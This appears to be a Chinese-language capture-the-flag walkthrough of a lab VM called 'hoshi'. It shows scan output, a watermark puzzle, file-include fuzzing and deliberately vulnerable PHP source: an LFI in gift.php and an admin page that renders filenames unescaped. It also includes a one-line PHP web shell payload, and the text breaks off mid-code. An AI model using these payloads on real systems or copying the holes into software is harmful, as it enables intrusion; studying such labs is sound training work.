\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ sudo arp-scan -I eth0 -l | grep PCS\n[sudo] password for kali: \n192.168.10.104 08:00:27:d2:ec:10 PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ IP=192.168.10.104\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ sudo nmap -sS $IP \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-21 20:30 EDT\nNmap scan report for 192.168.10.104\nHost is up (0.00047s latency).\nNot shown: 998 closed tcp ports (reset)\nPORT STATE SERVICE\n22\/tcp open ssh\n80\/tcp open http\nMAC Address: 08:00:27:D2:EC:10 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 0.69 seconds\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nI don't always scan ports, but when I do, I prefer RustScan.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan\\'s speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.104:22\nOpen 192.168.10.104:80\n[~] Starting Script(s)\n[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV" on ip 192.168.10.104\nDepending on the complexity of the script, results may take some time to appear.\n[~] Starting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-21 20:30 EDT\nNSE: Loaded 157 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nInitiating ARP Ping Scan at 20:30\nScanning 192.168.10.104 [1 port]\nCompleted ARP Ping Scan at 20:30, 0.05s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 20:30\nCompleted Parallel DNS resolution of 1 host. at 20:30, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating SYN Stealth Scan at 20:30\nScanning 192.168.10.104 [2 ports]\nDiscovered open port 22\/tcp on 192.168.10.104\nDiscovered open port 80\/tcp on 192.168.10.104\nCompleted SYN Stealth Scan at 20:30, 0.02s elapsed (2 total ports)\nInitiating Service scan at 20:30\nScanning 2 services on 192.168.10.104\nCompleted Service scan at 20:30, 6.10s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.10.104.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 1.07s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNmap scan report for 192.168.10.104\nHost is up, received arp-response (0.00034s latency).\nScanned at 2025-06-21 20:30:19 EDT for 7s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F\/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff\/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15\/h5hBsS\/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT\/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9\/wPmo6RBeb1d5t11SP8R5UHyI\/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=\n| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F\/EIiQoIHE=\n| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n|_http-title: \\xE5\\x95\\x86\\xE5\\x93\\x81\\xE5\\x8F\\x8D\\xE9\\xA6\\x88 - \\xE6\\x98\\x9F\\xE9\\x99\\x85\\xE5\\x95\\x86\\xE5\\x9F\\x8E\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.62 (Debian)\nMAC Address: 08:00:27:D2:EC:10 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 20:30\nCompleted NSE at 20:30, 0.00s elapsed\nRead data files from: \/usr\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 8.85 seconds\n Raw packets sent: 3 (116B) | Rcvd: 5 (600B)<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h2>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html,zip \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: zip,php,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php (Status: 403) [Size: 279]\n\/.html (Status: 403) [Size: 279]\n\/info.php (Status: 200) [Size: 85755]\n\/index.php (Status: 200) [Size: 7954]\n\/uploads (Status: 301) [Size: 318] [--> http:\/\/192.168.10.104\/uploads\/]\n\/admin.php (Status: 200) [Size: 2726]\n\/robots.txt (Status: 200) [Size: 86]\n\/.php (Status: 403) [Size: 279]\n\/.html (Status: 403) [Size: 279]\n\/server-status (Status: 403) [Size: 279]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h1>\n\u654f\u611f\u76ee\u5f55<\/h2>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/192.168.10.104 [200 OK] Apache[2.4.62], Country[RESERVED][ZZ], Email[support@interstellar.dsz], HTML5, HTTPServer[Debian Linux][Apache\/2.4.62 (Debian)], IP[192.168.10.104], Script, Title[\u5546\u54c1\u53cd\u9988 - \u661f\u9645\u5546\u57ce]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt \n\ufffd\ufffd\u057e\ufffd\ufffd logo \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd https:\/\/maze-sec.com\/special\/1\/\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u01f8\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\u02f5\ufffd\ufffd\u0631\ufffd\u0121\ufffd\u03b6\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\n\u672c\u7ad9\u7684 logo \u7075\u611f\u6765\u81ea https:\/\/maze-sec.com\/special\/1\/\uff0c\u4f46\u6211\u4eec\u7ed9\u5b83\u6dfb\u4e86\u70b9\u7279\u522b\u7684\u2018\u5473\u9053\u2019\uff01\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/$IP\/robots.txt | base64 \nsb7VvrXEIGxvZ28gwem40MC019QgaHR0cHM6Ly9tYXplLXNlYy5jb20vc3BlY2lhbC8xL6OstavO\n0sPHuPjL\/Mztwcu148zYsfC1xKGuzra1wKGvo6E=<\/code><\/pre>\n\n\u8fd9\u91cc\u7684\u4e2d\u6587\u662f\u63d0\u793a\uff0c\u8981\u6253\u5f00\u770b\u4e00\u4e0b\uff01\uff01\uff01\uff01\uff01\uff01<\/p>\n<\/blockquote>\n
<\/div>
\n<\/div><\/p>\n\u5947\u5947\u602a\u602a\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u7136\u540e\u5728info.php<\/code>\u53d1\u73b0\u4e86\u4e00\u4e9b\u4e1c\u897f\uff1a<\/p>\n<\/div>
\n<\/div><\/p>\n\u597d\u50cf\u5229\u7528\u6761\u4ef6\u6ca1\u6709\u90a3\u4e48\u82db\u523b\u554a\uff0c\u53ef\u4ee5\u4e0a\u4f20\uff0c\u4e0d\u80fd\u5305\u542b\uff0c\u672a\u7981\u7528\u76f8\u5173\u51fd\u6570\u3002
\n\u7136\u540e\u770b\u5230\u4e86\u7ba1\u7406\u5458\u540e\u53f0\uff1aadmin.php<\/code><\/p>\n<\/div><\/p>\n\u9996\u5148\u6392\u9664\u7206\u7834\uff1f\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u6ca1\u53d1\u73b0\u5565\uff0c\u6293\u4e2a\u5305\u770b\u770b\uff1a<\/p>\n
POST \/admin.php HTTP\/1.1\nHost: 192.168.10.104\nOrigin: http:\/\/192.168.10.104\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/137.0.0.0 Safari\/537.36\nContent-Type: application\/x-www-form-urlencoded\nReferer: http:\/\/192.168.10.104\/admin.php\nAccept-Language: zh-CN,zh;q=0.9\nAccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate\nCookie: PHPSESSID=6hb67scf650da0doj6lvcbdt2m\nContent-Length: 17\n\npassword=password<\/code><\/pre>\n\u662f\u4e00\u4e2a post \u4f20\u53c2\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6ce8\u5165\u6f0f\u6d1e\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ sqlmap -r sql --batch --level 4 --risk 3<\/code><\/pre>\n\u672a\u53d1\u73b0\u5229\u7528\u70b9\uff0c\u7ee7\u7eed\u770b\uff1a
\n![[Pasted image 20250622084602.png]] <\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/feedbacks.json\n[\n {\n "username": null,\n "email": "",\n "product": "",\n "feedback": "",\n "filename": "_20250622003025.txt",\n "timestamp": "2025-06-22 00:30:25"\n },\n {\n "username": null,\n "email": "",\n "product": "",\n "feedback": "",\n "filename": "_20250622003026.txt",\n "timestamp": "2025-06-22 00:30:26"\n }\n]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/_20250622003025.txt\n=== Feedback Details ===\nName: \nEmail: \nProduct: \nTime: 2025-06-22 00:30:25\nFeedback:\n\n================\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/_20250622003026.txt\n=== Feedback Details ===\nName: \nEmail: \nProduct: \nTime: 2025-06-22 00:30:26\nFeedback:\n\n================<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528\u4e00\u4e0b\u524d\u53f0\u7684\u90a3\u4e2a\u6295\u8bc9\u7cfb\u7edf\uff0c\u770b\u770b\u6709\u5565\u60c5\u51b5\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/uploads\/whoami_20250622010014.txt \n=== Feedback Details ===\nName: whoami\nEmail: whoami@id\nProduct: whoami\nTime: 2025-06-22 01:00:14\nFeedback:\nwhoami\n================<\/code><\/pre>\n\u591a\u6b21\u5c1d\u8bd5\uff0c\u4f3c\u4e4e\u4e0d\u4f1a\u8fdb\u884c\u89e3\u6790\u3002\u3002\u3002\u3002
\n\u4f46\u662f\u53d1\u73b0\u4e86\u4e00\u4e9b\u6709\u610f\u601d\u7684\u4e8b\u60c5\uff1a<\/p>\n
<?=`$_GET[0]`?>\n<?=`$_GET[0]`?><\/code><\/pre>\n\u88ab\u8f6c\u4e49\u4e86\u3002\u3002\u3002\u3002\u3002\u3002
\n\u5c1d\u8bd5\u57df\u540d\u89e3\u6790\uff0c\u4f46\u662f\u4f3c\u4e4e\u5e76\u4e0d\u662f\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ dirsearch -u http:\/\/interstellar.dsz\/ 2>\/dev\/null \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/hoshi\/reports\/http_interstellar.dsz\/__25-06-22_12-01-58.txt\n\nTarget: http:\/\/interstellar.dsz\/\n\n[12:01:58] Starting: \n[12:02:00] 403 - 281B - \/.ht_wsr.txt\n[12:02:00] 403 - 281B - \/.htaccess.bak1\n[12:02:00] 403 - 281B - \/.htaccess.orig\n[12:02:00] 403 - 281B - \/.htaccess_extra\n[12:02:00] 403 - 281B - \/.htaccess.save\n[12:02:00] 403 - 281B - \/.htaccess.sample\n[12:02:00] 403 - 281B - \/.htaccess_sc\n[12:02:00] 403 - 281B - \/.htaccess_orig\n[12:02:00] 403 - 281B - \/.htaccessBAK\n[12:02:00] 403 - 281B - \/.htaccessOLD\n[12:02:00] 403 - 281B - \/.htaccessOLD2\n[12:02:00] 403 - 281B - \/.html\n[12:02:00] 403 - 281B - \/.htm\n[12:02:00] 403 - 281B - \/.htpasswd_test\n[12:02:00] 403 - 281B - \/.htpasswds\n[12:02:00] 403 - 281B - \/.httr-oauth\n[12:02:01] 403 - 281B - \/.php\n[12:02:10] 200 - 1KB - \/admin.php\n[12:02:42] 200 - 23KB - \/info.php\n[12:03:02] 200 - 109B - \/robots.txt\n[12:03:04] 403 - 281B - \/server-status\n[12:03:04] 403 - 281B - \/server-status\/\n[12:03:14] 301 - 322B - \/uploads -> http:\/\/interstellar.dsz\/uploads\/\n[12:03:14] 200 - 682B - \/uploads\/\n\nTask Completed<\/code><\/pre>\n\u53cc\u56fe\u76f2\u6c34\u5370<\/h2>\n
\u7136\u540e\u8981\u4e86\u63d0\u793a\uff0cQQ.png,\u53cc\u56fe\u76f2\u6c34\u5370<\/code>\u3002\u3002\u3002\u3002\u3002
\n\u8fd9\u662f\u5728\u6e90\u4ee3\u7801\u51fa\u73b0\u8fc7\u7684\uff0c\u6211\u4e00\u76f4\u4ee5\u4e3a\u53ea\u662f\u4e00\u4e2alogo\u3002\u3002\u3002\u3002<\/p>\n\n\u53cc\u56fe+\u76f2\u6c34\u5370_\u53cc\u56fe\u76f2\u6c34\u5370-CSDN\u535a\u5ba2<\/a>
\nGitHub - chishaxie\/BlindWaterMark: \u76f2\u6c34\u5370 by python<\/a><\/p>\n<\/blockquote>\n\u770b\u4e00\u4e0b\u8fd9\u4e2a\u53cc\u56fe\u76f2\u6c34\u5370\u662f\u4e2a\u5565\u60c5\u51b5\uff1a<\/p>\n
# wget http:\/\/192.168.10.104\/QQ.png\n# wget https:\/\/maze-sec.com\/img\/QQ.png -O QQ2.png\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ \/usr\/local\/python3.9\/bin\/python3.9 ~\/tools\/BlindWaterMark\/bwmforpy3.py decode QQ.png QQ2.png result.png\nMatplotlib is building the font cache; this may take a moment.\nimage<QQ.png> + image(encoded)<QQ2.png> -> watermark<result.png>\n[ WARN:0@8.589] global loadsave.cpp:848 imwrite_ Unsupported depth image for selected encoder is fallbacked to CV_8U.<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u662f\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s http:\/\/192.168.10.104\/hoshi\/gift.php \n<p style='color:red'>\u975e\u6cd5\u6587\u4ef6\u540d<\/p> <\/code><\/pre>\n\u540e\u9762\u7ed3\u5408\u6e90\u4ee3\u7801\u8fdb\u884c\u5206\u6790\u5427\uff0c\u4e0d\u7136\u8bd5\u9519\u6709\u70b9\u75db\u82e6\u7684\u3002\u3002\u3002<\/p>\n
LFI<\/h2>\n
\u8fd9\u91cc\u7684\u6e90\u4ee3\u7801\u4e3a\uff1a<\/p>\n
# gift.php\n<?php\n\n$allow_dir = realpath(__DIR__ . '\/..\/') . '\/';\n$filename = isset($_GET['file']) ? $_GET['file'] : '';\n\n\/\/ \u53ea\u5141\u8bb8\u5305\u542bhtml\u76ee\u5f55\u4e0b\u7684\u6587\u4ef6\uff0c\u4e14\u4e0d\u80fd\u5305\u542b'..'\u548c'php:'\u7b49\u4f2a\u534f\u8bae\nif (\n $filename &&\n strpos($filename, '..') === false &&\n strpos($filename, 'php:') === false &&\n strpos($filename, ':\/\/') === false &&\n strpos($filename, 'filter') === false &&\n strpos($filename, 'data:') === false &&\n strpos($filename, 'zip:') === false &&\n strpos($filename, 'phar:') === false &&\n strpos($filename, 'glob:') === false &&\n strpos($filename, 'expect:') === false &&\n strpos($filename, 'input') === false &&\n preg_match('\/^[a-zA-Z0-9_\\-\\.]+$\/', $filename)\n) {\n $target = $allow_dir . $filename;\n if (file_exists($target)) {\n \/\/ \u5305\u88f9php\u4ee3\u7801\uff0c\u6f14\u793a\u6587\u4ef6\u5305\u542b+RCE\n echo "<pre>";\n include($target);\n echo "<\/pre>";\n } else {\n echo "<p style='color:red'>\u6587\u4ef6\u4e0d\u5b58\u5728<\/p>";\n }\n} else {\n echo "<p style='color:red'>\u975e\u6cd5\u6587\u4ef6\u540d<\/p>";\n}\n?><\/code><\/pre>\n\u4ec5\u5141\u8bb8\u5305\u542b\u672c\u6587\u4ef6\u4e0b\u7684\u6587\u4ef6\uff0c\u6545\u5fc5\u987b\u5f97\u5c1d\u8bd5FUZZ\u5230\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ ffuf -u "http:\/\/$IP\/hoshi\/gift.php?FUZZ=index.html" -c -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -fr "\u975e\u6cd5" 2>\/dev\/null\nfile [Status: 200, Size: 40, Words: 2, Lines: 1, Duration: 1ms]<\/code><\/pre>\n\u7136\u540e\u5229\u7528\u8be5\u53c2\u6570\u8fdb\u884c\u5305\u542b\u672c\u5730\u6587\u4ef6\u8fdb\u884c\u6d4b\u8bd5\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/hoshi]\n\u2514\u2500$ curl -s "http:\/\/$IP\/hoshi\/gift.php?file=index.html" \n<p style='color:red'>\u6587\u4ef6\u4e0d\u5b58\u5728<\/p><\/code><\/pre>\n\u957f\u5ea6\u4e0e\u524d\u9762\u7684\u975e\u6cd5\u6587\u4ef6\u540d<\/code>\u4e00\u81f4\uff0c\u6240\u4ee5\u5f88\u96be\u6d4b\u8bd5\u51fa\u6765\u3002\u3002\u3002\u3002\u3002<\/p>\nhttp:\/\/192.168.10.106\/hoshi\/gift.php?file=admin.php<\/code><\/pre>\n<\/div><\/p>\n\u662f\u4e00\u4e2a\u7578\u5f62\u7684\u754c\u9762\uff0c\u4f46\u662f\u540e\u9762\u6709\u7528\u7684\uff01\uff01\uff01\uff01<\/p>\n
\u8fd9\u91cc\u7fa4\u91cc\u53c8\u6709\u63d0\u793a\uff0c\u5bc6\u7801\u65e0\u9700\u7206\u7834\uff0c\u5c31\u5728\u754c\u9762\u4e2d\uff0c<\/p>\n
<\/div><\/p>\n<\/div><\/p>\n\u4e00\u95ea\u4e00\u95ea\u7684\u5ba2\u670d\u7535\u8bdd\u5c31\u662f\u63d0\u793a\uff0c\u6240\u4ee5\uff0c\u5982\u679c\u8db3\u591f\u7684\u7528\u4e8e\u5c1d\u8bd5\uff0c\u5176\u5b9e\u5f88\u65e9\u5c31\u53ef\u4ee5\u8bd5\u51fa\u6765\uff0c\u4f46\u662f\u81f3\u5c11\u6211\u6ca1\u641e\u51fa\u6765\uff0c\u5bb3\u3002\u3002\u3002<\/p>\n
\u8fd9\u5c31\u662f\u5bc6\u7801\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\nRCE<\/h2>\n
\u8fd9\u91cc\u9700\u8981\u53c2\u8003\u6e90\u4ee3\u7801\u4e86\uff1a<\/p>\n
<?php\nob_start();\n?>\n---------------------------------\n <!-- \u767b\u5f55\u8868\u5355 -->\n <?php\n session_start();\n $admin_password = '400-123-4567';\n if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['password'])) {\n if ($_POST['password'] === $admin_password) {\n $_SESSION['logged_in'] = true;\n } else {\n echo '<p class="text-yellow-500 text-center error-message mb-6">\u5bc6\u7801\u9519\u8bef\uff01<\/p>';\n }\n }\n\n if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {\n ?>\n <form action="" method="POST" class="bg-gray-800 p-8 rounded-lg glow mb-12 max-w-md mx-auto">\n <div class="mb-6">\n <label for="password" class="block text-sm font-medium text-gray-300">\u7ba1\u7406\u5458\u5bc6\u7801<\/label>\n <input type="password" name="password" id="password" required class="mt-1 p-3 w-full bg-gray-700 border border-gray-600 rounded-md text-white focus:ring-2 focus:ring-blue-500" placeholder="\u8bf7\u8f93\u5165\u5bc6\u7801">\n <\/div>\n <button type="submit" class="w-full bg-blue-600 hover:bg-blue-700 text-white font-bold py-3 px-4 rounded-md transition duration-300">\u767b\u5f55<\/button>\n <\/form>\n <?php } else { ?>\n\n <!-- \u7edf\u8ba1\u6570\u636e -->\n <div class="bg-gray-800 p-8 rounded-lg glow">\n <h2 class="text-2xl font-semibold text-white mb-6">\u53cd\u9988\u7edf\u8ba1\u6982\u89c8<\/h2>\n <p class="text-gray-300 mb-4">\u4ee5\u4e0b\u662f\u7528\u6237\u63d0\u4ea4\u7684\u5546\u54c1\u53cd\u9988\u7edf\u8ba1\u6570\u636e\uff0c\u5305\u542b\u53cd\u9988\u603b\u6570\u3001\u6587\u4ef6\u6570\u91cf\u53ca\u5b58\u50a8\u5360\u7528\u60c5\u51b5\u3002\u6240\u6709\u53cd\u9988\u6587\u4ef6\u53ef\u5728<a href="uploads\/" class="text-blue-500 hover:underline">\u53cd\u9988\u6863\u6848\u76ee\u5f55<\/a>\u4e2d\u67e5\u770b\u3002<\/p>\n <?php\n $upload_dir = __DIR__ . '\/uploads\/';\n $metadata_file = $upload_dir . 'feedbacks.json';\n\n \/\/ \u7edf\u8ba1\u53cd\u9988\u603b\u6570\n $total_feedbacks = 0;\n $user_counts = [];\n $product_counts = [];\n if (file_exists($metadata_file)) {\n $feedbacks = json_decode(file_get_contents($metadata_file), true);\n if (is_array($feedbacks)) {\n $total_feedbacks = count($feedbacks);\n foreach ($feedbacks as $fb) {\n $username = $fb['username'];\n $product = $fb['product'];\n $user_counts[$username] = ($user_counts[$username] ?? 0) + 1;\n $product_counts[$product] = ($product_counts[$product] ?? 0) + 1;\n }\n } else {\n echo '<p class="text-yellow-400 text-center error-message mb-4">\u65e0\u6cd5\u89e3\u6790\u53cd\u9988\u6570\u636e\uff01<\/p>';\n }\n } else {\n echo '<p class="text-yellow-400 text-center error-message mb-4">\u53cd\u9988\u6570\u636e\u6587\u4ef6\u4e0d\u5b58\u5728\uff01<\/p>';\n }\n\n \/\/ \u65b0\u7edf\u8ba1\u9762\u677f\uff0c\u904d\u5386\u76ee\u5f55\u5e76\u6e32\u67d3\u6587\u4ef6\u540d\uff08\u4e0d\u505a\u8f6c\u4e49\uff0c\u5141\u8bb8php\u4ee3\u7801\u6267\u884c\uff09\n $file_count = 0;\n $total_size = 0;\n $files = glob($upload_dir . '*.txt');\n echo '<div class="bg-gray-700 p-6 rounded-md mb-8">';\n echo '<h2 class="text-xl font-bold text-blue-400 mb-4">\u53cd\u9988\u6587\u4ef6\u5217\u8868<\/h2>';\n echo '<table class="min-w-full text-left text-gray-200"><thead><tr><th class="py-2">\u6587\u4ef6\u540d<\/th><th class="py-2">\u5927\u5c0f<\/th><th class="py-2">\u64cd\u4f5c<\/th><\/tr><\/thead><tbody>';\n foreach ($files as $file) {\n $filename = basename($file);\n $size = filesize($file);\n $file_count++;\n $total_size += $size;\n echo '<tr><td class="py-1 px-2 border-b">';\n echo $filename;\n echo '<\/td><td class="py-1 px-2 border-b">' . $size . ' B<\/td>';\n echo '<td class="py-1 px-2 border-b">';\n echo '<form method="POST" style="display:inline" onsubmit="return confirm(\\'\u786e\u5b9a\u8981\u5220\u9664\u6b64\u6587\u4ef6\u5417\uff1f\\');">';\n echo '<input type="hidden" name="delete_file" value="' . htmlspecialchars($filename) . '"><button type="submit" class="text-red-400 hover:text-red-600 underline">\u5220\u9664<\/button>';\n echo '<\/form>';\n echo '<\/td><\/tr>';\n }\n echo '<\/tbody><\/table>';\n echo '<div class="mt-4 text-blue-300">\u603b\u6587\u4ef6\u6570: ' . $file_count . '\uff0c\u603b\u5927\u5c0f: ' . ($total_size > 1024 ? number_format($total_size\/1024,1).' KB' : $total_size.' B') . '<\/div>';\n echo '<\/div>';\n\n echo '<h3 class="text-lg font-semibold text-blue-400 mb-2">\u7528\u6237\u53cd\u9988\u7edf\u8ba1<\/h3>';\n echo '<ul class="list-disc list-inside text-gray-200 mb-4">';\n if (count($user_counts) === 0) {\n echo '<li>\u6682\u65e0\u6570\u636e<\/li>';\n } else {\n foreach ($user_counts as $user => $count) {\n echo '<li>' . htmlspecialchars($user) . ': ' . $count . ' \u6761\u53cd\u9988<\/li>';\n }\n }\n echo '<\/ul>';\n\n echo '<h3 class="text-lg font-semibold text-blue-400 mb-2">\u5546\u54c1\u53cd\u9988\u7edf\u8ba1<\/h3>';\n echo '<ul class="list-disc list-inside text-gray-200">';\n if (count($product_counts) === 0) {\n echo '<li>\u6682\u65e0\u6570\u636e<\/li>';\n } else {\n foreach ($product_counts as $product => $count) {\n echo '<li>' . htmlspecialchars($product) . ': ' . $count . ' \u6761\u53cd\u9988<\/li>';\n }\n }\n echo '<\/ul>';\n ?>\n <\/div>\n <?php } ?>\n <\/div>\n\n <footer class="text-center text-gray-400 text-sm mt-12 py-6">\n <p>\u00a9 2025 \u661f\u9645\u5546\u57ce | \u7ba1\u7406\u5458\u4e13\u7528<\/p>\n <\/footer>\n<\/body>\n<\/html>\n<?php\n\/\/ \u5220\u9664\u6587\u4ef6\u5904\u7406\uff08\u5fc5\u987b\u5728\u4efb\u4f55\u8f93\u51fa\u524d\uff09\nif (isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true && isset($_POST['delete_file'])) {\n $upload_dir = __DIR__ . 